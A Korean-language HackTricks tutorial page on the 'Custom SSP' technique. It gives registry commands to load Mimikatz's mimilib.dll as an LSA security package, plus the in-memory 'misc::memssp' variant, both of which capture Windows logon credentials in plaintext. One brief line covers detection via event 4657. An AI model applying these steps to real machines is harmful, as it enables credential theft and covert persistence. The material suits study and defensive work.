Custom SSP
Reading time: 2 minutes
tip
AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks 지원하기
- 구독 계획 확인하기!
- **💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.
- HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.
Custom SSP
SSP(보안 지원 공급자)가 무엇인지 여기에서 알아보세요.
자신의 SSP를 생성하여 명확한 텍스트로 자격 증명을 캡처할 수 있습니다.
Mimilib
Mimikatz에서 제공하는 mimilib.dll
바이너리를 사용할 수 있습니다. 이것은 모든 자격 증명을 명확한 텍스트로 파일에 기록합니다.
dll을 C:\Windows\System32\
에 배치하세요.
기존 LSA 보안 패키지 목록을 가져옵니다:
PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages REG_MULTI_SZ kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u
mimilib.dll
를 보안 지원 공급자 목록(보안 패키지)에 추가합니다:
reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"
재부팅 후 모든 자격 증명은 C:\Windows\System32\kiwissp.log
에 평문으로 저장됩니다.
메모리 내
Mimikatz를 사용하여 메모리에 직접 주입할 수도 있습니다(약간 불안정하거나 작동하지 않을 수 있습니다):
privilege::debug
misc::memssp
이것은 재부팅 후에도 유지되지 않습니다.
완화
이벤트 ID 4657 - HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages
의 감사 생성/변경
tip
AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks 지원하기
- 구독 계획 확인하기!
- **💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.
- HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.